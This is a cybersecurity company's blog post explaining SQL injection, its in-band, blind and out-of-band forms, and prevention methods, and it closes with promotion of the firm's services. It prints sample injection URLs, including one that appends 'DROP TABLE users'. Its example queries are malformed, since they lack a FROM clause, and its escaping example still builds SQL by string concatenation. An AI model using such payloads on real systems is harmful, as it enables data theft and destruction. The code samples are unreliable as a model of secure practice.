What Is an SQL Injection Attack and How to Prevent It
“What is an SQL injection attack and how do I stop it from happening?” This is a question asked by many organisations, and with good reason.
According to the Open Web Application Security Project, injection attacks, which also include SQL injections, were the third most serious web application security risk in 2021.
Out of the applications they tested, around 274,000 were the result of injection, which goes to show just how resilient you and your organisation needs to be when faced with this type of cyber attack.
In this post we will be providing answers to a majority of questions you might have on SQL injection attacks, which includes:
- The aforementioned, what is an SQL injection attack?
- How are SQL attacks performed?
- What are the three main types of SQL attacks?
- And most importantly, how can you prevent it?
You’ll find all of this information below, starting with a clear explanation as to what this type of cyber attack is and involves.
Let’s get started.
What Is an SQL Injection Attack?
A SQL injection otherwise known as SQLI, is a type of cyber attack that injects malicious SQL code into an application, giving the attacker the ability to view or modify a database without permission.
How attackers choose to modify your database will vary from case to case. Some might use it to view sensitive company data and others could look for private customer details.
A successful SQL injection can cause a lot of damage to a business, leaving them with a variety of additional problems that they then need to sort out, such as angry customers and a tarnished reputation that is not so easily repaired.
Another major problem is one we’ve already mentioned, whereby a hacker modifies a database without permission. Not having backups or access to the pre-altered data could devastate an organisation.
This is one of the reasons why it is essential to have a full plan in place should you become subject to one of these attacks, which typically involve working with an external cybersecurity team.
How An SQL Injection Attack Is Executed
In simple terms, SQL is a language used in programming that is designed for data in the relational data stream management system.
In other words, SQL queries execute commands including commands to retrieve data, update data, and delete records. To infiltrate this system, hackers will insert malicious code into strings that are passed to a SQL server.
Like phishing and other popular cyber attacks, there are several ways to execute this form of attack, with some of the most common ways involving inputs in a web application or a web page (such as input fields that allow free text).
SQL Injection Attack Example
Let’s quickly look at an SQL injection example to show you what this looks like in practice using a hypothetical scenario where an attacker is looking to manipulate a standard SQL query to exploit non-validated input vulnerabilities in a database.
This is a HTTP for an online store:
http://www.onlinestore.com/items/items.asp?itemid=999 or 1=1
And here’s what the corresponding SQL query for this request looks like:
SELECT ItemName, ItemDescription
WHERE ItemNumber = 999 OR 1=1
Since 1=1 is always true, the query will then return all of the product names and descriptions for those in the database, even those that you may not be eligible to access.
Incorrectly filtered characters to alter SQL commands is another way for malicious attackers to cause damage to your organisation.
For example, entering http://www.onlinestore.com/items/iteams.asp?itemid=999; DROP TABLE users would generate the following SQL query allowing the hacker to delete the database:
SELECT ItemName, ItemDescription
WHERE ItemNumber = 999; DROP TABLE USERS
3 Types of SQL Injection
Understanding the variations of an SQL injection attack is essential in understanding how much damage it can cause, but also, what to look out for.
There are three main types of SQL injection of note:
- In-band SQL Injection
- Inferential SQL Injection
- Out-of-Band SQL Injection
All three offer something unique to be aware of but will mostly lead to the same outcomes for hackers, that being:
Full infiltration of your organisation’s database.
In-Band SQL Injection
In-band SQL injections are the most common type of SQL-related attack. This involves a malicious user using the same communication channel to attack and gather results.
Error-based SQL injection and union-based SQL injection are two of the most common types of in-band SQL injection attacks, and are executed in very different ways.
The former takes advantage of a SQL command that generates an error message from the database server. Once embedded, the hacker will then gain access to the database externally.
Union-based SQL injection is a technique that uses the Union SQL operator to combine multiple select statements and return a single HTTP response. Hackers can then extract information from the database.
Inferial SQL Injection
Inferial SQL infection, or blind SQL injection as it’s also known, is where malicious users can learn about the structure of the server by sending data payloads and then observing the response.
Again, like with in-band SQL injection, there are multiple different attacks to be aware of:
- Boolean Injection: An attack where a SQL query is sent to the database in order to observe the result. Attackers can then infer if a result is either true or false based on whether or not the information in the HTTP response was altered.
- Time-Based Injection: With this technique, malicious users send a SQL query to the database, making it wait a specific number of seconds before sending a response. Those performing this attack can then determine if the result is true or false based on the number of seconds between the message and the response.
Inferial SQL injection is a lot less common than in-band injections, but that doesn’t make them any less important to nip in the bud, and fast.
Out-of-Band SQL Injection
This is the least common form of SQL injection attack. With out-of-band injections, a hacker will use a different communication channel for the attack. Think of it as the polar opposite of in-band SQL injection.
Nefarious individuals will use this method if a server is too slow or unstable to use one of the other two types of SQL injection we’ve mentioned.
How to Prevent SQL Injection Attacks
There are many ways to prevent SQLI attacks from taking place, including ways to protect your organisation should they occur, which is an important point to make as these attacks can and do happen.
User input channels tend to be the main vector for such attacks, which requires a controlled approach, one that vets user input to watch for attack patterns. This is just one of the ways to prevent SQL injection attacks.
Other methods can be a lot more thorough, input validation being one of the most common. This acts as a sort of digital watchdog, one that validates based on the accepted type, length, format, and so on.
In other words, only the value which passes the validation can be processed, thus stopping hackers from carrying out their actions right at the beginning.
Validation shouldn’t only be applied to fields that allow users to type in input, meaning you should also take care of the following situations in equal measure:
- Use regular expressions as whitelists for structured data (such as name, age, income, survey response, zip code) to ensure strong input validation.
- In case of a fixed set of values (such as drop-down list, radio button), determine which value is returned. The input data should match one of the offered options exactly.
This prevention method is a means to pre-compiling an SQL statement so that you can then supply the parameters in order for the statement to be executed. This method makes it possible for the database to recognise the code and separate it from input data.
The user input is automatically quoted and the supplied input will not cause the change of the intent, meaning this coding style is an effective way of mitigating an SQL injection attack.
Stored procedures (SP) require the developer to group one or more SQL statements into a logical uni to create an execution plan. Subsequent executions allow statements to be automatically parameterised.
Simply put, it’s a type of code that can be stored and used many times, meaning you simply execute the query each time rather than writing it over and over again.
Character-escaping functions should be used to ensure that the database management system (DBMS) never confuses the SQL statement provided by the developer, which can happen.
This can be a tough one to understand so let’s use an example. Let’s say you use the mysql_real_escape_string() in PHP to avoid characters that could lead to an unintended SQL command.
An altered version of the login bypass scenario would then look like this:
$db_connection = mysqli_connect(“localhost”, “user”, “password”, “db”);
$username = mysqli_real_escape_string($db_connection, $_POST[‘username’]);
$password = mysqli_real_escape_string($db_connection, $_POST[‘password’]);
$query = “SELECT * FROM users WHERE username = ‘” . $username. “‘ AND password = ‘” . $password . “‘”;
Before your changes, this code would be vulnerable by adding an escape character in front of the single quotes. That problem is mitigated by the small alteration made, thus preventing a successful SQLI.
Web Application Firewall
Easily one of the best practices to identify and stop SQL injection attacks is by setting up something known as a web application firewall (WAF).
This firewall acts as a shield in front of your web traffic, analysing what goes in and what goes out of the servers identifying any potential threats as it runs. It’s a prevention tool that isn’t limited to just SQL injections attacks either.
WAFs are very efficient at protecting your organisation from a number of threats:
- Session Hijacking
- Cookie Poisoning
- Parameter Tampering
- Cross-Site Scripting (XSS)
- DDoS Attacks
We have a blog dedicated to distributed denial of service (DDoS) attacks, for those interested in finding out more.
TLR’s Approach to SQL Injection Attacks
Do keep in mind that there is only so much you can do alone to prevent SQL injection attacks, which is why many organisations turn to TLR Global to double down on their prevention efforts.
We offer a range of cybersecurity services, all geared towards keeping your organisation up and running and free from malicious activity.
For SQLI, we’d highly recommend our digital risk protection services that continuously monitor for threats, indicators of risk, and even provide remediation recommendations should you need them.
This isn’t a blanket approach either, meaning we tailor these services around your organisation to strengthen the areas that matter.
Are you uncomfortable with handling your cybersecurity or simply don’t have the resources? We also offer managed security services whereby we work with you directly to manage your online security, either remotely or onsite.
We become the cybersecurity extension of your organisation, essentially. This is a very helpful option should you decide to run with Cavalry or our SETH solutions.
What Is an SQL Injection Attack and How to Prevent It?
“What is an SQL injection attack and how do I stop it from happening?” Hopefully we’ve given you the answers you were looking for to this question, and many others relating to SQLI.
To recap, we’ve defined what an SQL injection attack is, we’ve looked at how this type of cyber attack is executed, we’ve identified the three main types of SQL injection, and we then looked at various prevention methods.
We also covered the TLR approach to this very common issue.
Do get in touch if you’d like to find out more, or would like to learn more about our approach to SQLI or any other cyber-related issues you might be having/want safeguarding from.
As mentioned, we have a range of cyber solutions available that all work to shield your organisation’s future. In the meantime, why not check out some of our other blog posts on the site?
We have posts dedicated to preventing data breaches, phishing, rootkits, exfiltration, and many more.